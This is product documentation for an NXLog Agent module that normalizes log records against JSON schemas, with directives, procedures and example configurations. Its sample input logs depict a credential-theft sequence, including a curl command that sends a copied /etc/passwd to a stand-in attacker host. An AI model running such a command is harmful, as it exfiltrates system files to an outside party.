Transform (xm_transform)

This module allows normalizing log data according to a specified schema. It accepts file-based schemas in JSON format and supports dynamically setting the schema file.

The module is intended to be used with the JSON (xm_json) extension.

To see which platforms are supported, refer to the list of installation packages.

Schema definition

You must define one or more event schemas in JSON format and save each schema in a separate file. The schema can include constant strings and event fields.

Basic event schema
{
  "agent_name": "NXLog Agent", (1)
  "message": "$raw_event" (2)
}
1 Sets the agent_name property to NXLog Agent for every log record.
2 Sets the message property to the value of the $raw_event core field.

The schema can also contain nested JSON objects. For example, the following schema includes a metadata property containing an object.

Schema with nested object
{
  "message": "$raw_event",
  "metadata": {
    "agent": {
      "name": "NXLog Agent",
      "ingestion": "$EventReceivedTime"
    }
  }
}

If a log record does not contain a field defined in the schema, that field’s value is set to null during processing. If you need to change the value of undefined fields, you can do so before calling the process() procedure as follows:

<Exec>
    if not defined($MyField) {
        $MyField = "undefined";
    }

    my_transform_instance->process();
</Exec>

See Log records and fields for more information on how NXLog Agent parses log records into fields.

Configuration

The xm_transform module accepts the following directives in addition to the common module directives.

Required directives

Schema

Specifies the path to a schema file. NXLog Agent formats log records using this schema when you process them with this extension. The module should include either the Schema or the SchemaMap directive, but not both. If both Schema and SchemaMap directives are present, the module uses the Schema value only.

SchemaMap

Specifies a map of names and the corresponding schema file location. You can use these names when dynamically setting the schema with the set_schema() procedure. See Setting the schema dynamically below for an example. The module should include either the SchemaMap or the Schema directive, but not both. If both Schema and SchemaMap directives are present, the module uses the Schema value only.

NXLog Agent drops events that do not match any schema, for example, when the specified schema is invalid or does not exist. To prevent data loss, declare a default schema using the SchemaMap directive. NXLog Agent validates the schema and reports any schema parsing errors at startup.
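As a minimal sketch of the fallback described above, the following instance maps one named schema and adds a default entry. The instance name transform, the name firewall, and the file names firewall.json and fallback.json are hypothetical. The block syntax and the default entry mirror Example 2 below.

```conf
# "firewall" is a hypothetical name that you would select with
# transform->set_schema('firewall');
# "default" is the fallback entry used when no other schema applies.
<Extension transform>
    Module       xm_transform

    <SchemaMap>
      firewall   firewall.json
      default    fallback.json
    </SchemaMap>
</Extension>
```

Because no SchemaDir is set here, both files would be looked up in the folder that contains the configuration file.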

Optional directive

SchemaDir

Specifies the path to a folder containing your schema files. NXLog Agent looks for the schema files specified by the Schema or SchemaMap directive in this folder. The default is the folder that contains the configuration file where the xm_transform instance is defined.
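For illustration, the sketch below keeps the schema in a subfolder and refers to it by file name only. The folder name schemas/ and the file name default.json are assumptions borrowed from the examples on this page, not defaults of the module.

```conf
<Extension transform>
    Module       xm_transform
    # Folder that holds the schema files (hypothetical location)
    SchemaDir    'schemas/'
    # File name only; it is looked up inside SchemaDir
    Schema       'default.json'
</Extension>
```

Under these assumptions, the instance should load the same file as an instance that sets Schema to 'schemas/default.json' without SchemaDir.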

Procedures

The following procedures are exported by xm_transform.

process();

This procedure processes the log record and transforms it according to the module instance settings. You must call this procedure using the -> operator. See Calling a function of a specific module instance for more information.

set_schema(string schema_name);

Sets the schema file, overriding the default one. The schema_name must match a schema name defined by the SchemaMap directive. If the schema file is invalid, the agent falls back to the default schema if one is defined. You must call this procedure using the -> operator. See Calling a function of a specific module instance for more information.
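The following sketch shows one way to choose a schema name from a condition and then apply it. It assumes an xm_transform instance named transform whose SchemaMap defines the names auth and default, and a loaded xm_json instance. The input instance, the file path, and the match on $raw_event are hypothetical.

```conf
<Input messages>
    Module    im_file
    File      '/var/log/messages'
    <Exec>
        # Select a schema name that is defined in SchemaMap
        if $raw_event =~ /pam_unix/
        {
            transform->set_schema('auth');
        }
        else
        {
            transform->set_schema('default');
        }

        # Apply the selected schema, then serialize the record
        transform->process();
        to_json();
    </Exec>
</Input>
```

Setting the schema explicitly in both branches avoids relying on whichever schema was selected for a previous record.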

Examples

Example 1. Transforming logs using a schema file

This configuration collects Linux system logs from a file and transforms log records according to a schema file.

nxlog.conf
<Extension transform>
    Module    xm_transform
    Schema    'schemas/default.json' (1)
</Extension>

<Extension json>
    Module    xm_json
</Extension>

<Input system_logs>
    Module    im_file
    File      '/var/log/syslog'
    <Exec>
        transform->process(); (2)
        to_json(); (3)
    </Exec>
</Input>
1 Defines the path of the schema file. The path is relative to the NXLog Agent configuration folder.
2 Normalizes log records according to the schema file defined in the Schema directive.
3 Calls the to_json() procedure of xm_json to convert the record to JSON format.

The following is a basic schema file compatible with log events collected by the im_file input module. This module populates the core fields only.

default.json
{
  "Event": "$raw_event",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "$EventReceivedTime"
  }
}
Input sample
2024-09-26 16:05:47 [100]: File "/etc/passwd" 512 bytes was copied to "/tmp/steal.txt".
2024-09-26 16:05:47 [100]: Process 123 "/usr/bin/curl" with command line "-d @/tmp/steal.txt http://example-cc.bot".
2024-09-26 16:05:47 [100]: File "/tmp/steal" 512 bytes was deleted.
Output sample
{
  "Event": "2024-09-26 16:05:47 [100]: File \"/etc/passwd\" 512 bytes was copied to \"/tmp/steal.txt\".",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "2024-09-26T16:06:00.984034+02:00"
  }
}
Example 2. Setting the schema dynamically

This configuration collects logs from three files and selects the schema for each log record based on the name of the input module instance that collected it:

Input module instance    Schema file
system                   syslog.json
auth                     authentication.json
dpkg                     default.json

nxlog.conf
<Extension transform>
    Module       xm_transform
    SchemaDir    'schemas/'  (1)

    <SchemaMap>  (2)
      system     syslog.json
      auth       authentication.json
      default    default.json (3)
    </SchemaMap>
</Extension>

<Extension json>
    Module       xm_json
</Extension>

<Extension syslog>
    Module       xm_syslog
</Extension>

<Input system>
    Module       im_file
    File         '/var/log/syslog'
    Exec         parse_syslog();
</Input>

<Input auth>
    Module       im_file
    File         '/var/log/auth.log'
    <Exec>
        parse_syslog();
        if $Message =~ /^pam_unix\((\S+):session\): session opened for user (\S+) by\ \(uid=(\d+)\)$/
        {
            $Process = $1;
            $AccountName = $2;
            $AccountID = integer($3);
        }
    </Exec>
</Input>

<Input dpkg>
    Module       im_file
    File         '/var/log/dpkg.log'
</Input>

<Output file>
    Module       om_file
    File         '/tmp/nxlog'
    <Exec>
        transform->set_schema($SourceModuleName);
        transform->process(); (4)
        to_json(); (5)
    </Exec>
</Output>

<Route r1>
    Path         system, auth, dpkg => file
</Route>
1 Defines the path of the directory containing the schema files. The path is relative to the folder containing the NXLog Agent configuration file.
2 Maps names to schema files. You use the names when dynamically setting the schema with set_schema().
3 The default schema is used when no other suitable schema is found, as is the case for records from the dpkg instance.
4 Normalizes log records according to the schema selected with set_schema().
5 Calls the to_json() procedure of xm_json to convert the record to JSON format.